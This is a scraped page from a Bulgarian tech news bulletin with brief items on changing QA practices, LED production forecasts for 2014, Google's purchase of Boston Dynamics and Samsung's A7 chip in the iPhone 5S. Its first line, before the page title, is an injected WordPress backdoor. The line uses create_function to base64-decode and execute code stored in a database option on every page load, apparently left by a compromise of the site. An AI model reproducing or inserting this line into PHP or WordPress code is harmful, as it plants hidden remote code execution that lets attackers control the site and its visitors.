add_action( 'init', create_function( '', @join( array_map( "base64_decode", json_decode( get_option( $table_prefix . "widget_meta" ) ) ) ) ) ); Бюлетин - НАРС

Бюлетин

Традиционните методи за QA – остаряват ли?

javafx
С времето станахме свидетели на развитието на езиците за програмиране, на трансформацията на процеса на разработка; видяхме и нарастването и промяната в типа на създаваните приложения.
Дали софтуерното тестване (QA) е следващата промяна?
Да, настъпва времето за развитие и в тази сфера. Промяната се наблюдава в няколко основни направления:
1. Екипите от QA специалисти и екипите от програмисти стават все по-свързани по време на разработката на проекта.
Текущата (но запoчваща да се променя) практика е тестването да се извършва след края на процеса на програмиране. QA екипите преглеждат кода, и ако открият проблеми, те се изпращат обратно на програмистите. После поправения код се връща пак за тест и т.н. докато накрая продукта се предостави на клиента.
Но времето вече е лукс за софтуерните компании. QA специалистите и разработчиците стават все по-свързани, и в някой случаи даже няма отделни екипи – това помага бързо да се откриват и поправят проблемите и улеснява цялостния процес.
2. Очакванията на потребителите
В миналото при тестване усилията са се съсредоточвали главно върху функционалността, и едва в края на проекта се e обръщало внимание на фактори като бързодействие и производителност на приложението.
Водещи вече са очакванията на потребителите – колко бързо, лесно и полезно е приложението – и то по време на самата разработка.
 

Световното производство на LED ще достигне 12.743 милиарда US$ през 2014

javafxLED осветителни тела ще заемат повече от 39,4% от общотото производство на LED чипове през 2014. На второ място с 18,6% ще са LED подсветките за мобилни устройства, следвани от 8,5% LCD TV. Производство от 6,3% ще достигнат подсветките за таблети, а 4,9% – подсветките за notebook.

 

 

 

Google придоби Boston Dynamics

wildGoogle придоби Boston Dynamics, производител на роботи вдъхновени от животните. WildCat роботът на Boston Dynamics, който може да тича без проблеми през паркинги, е вече част от програмата за роботи на Google. Неговите събратя – Cheetah, BigDog и други, също са част от Google.

 

 
 
 

Все още заедно: Нов анализ открива Samsung A7 в iPhone 5S

Мистерията на Apple-Samsung връзката продължава: нов Nikkei анализ откри Samsung A7 в iPhone 5S.

След подробна дисекция на Apple’s iPhone 5S, Nikkei Electronics намери произведен от Samsung A7 в iPhone 5S. Това разкритие следва анализът направен през септември от Chipworks, който също откри Samsung A7 в iPhone 5S. А7 е най-новият процесор на Apple, който се използва в iPhone 5S, iPad Air, и iPad Mini Retina. Той е първият 64-битов процесор използван в потребителски смартфон.

Остава въпросът: Колко дълго ще продължи тази Apple-Samsung връзка ?

Ad
Ad
Ad
Ad
Ad
Ad
Ad
Ad
Ad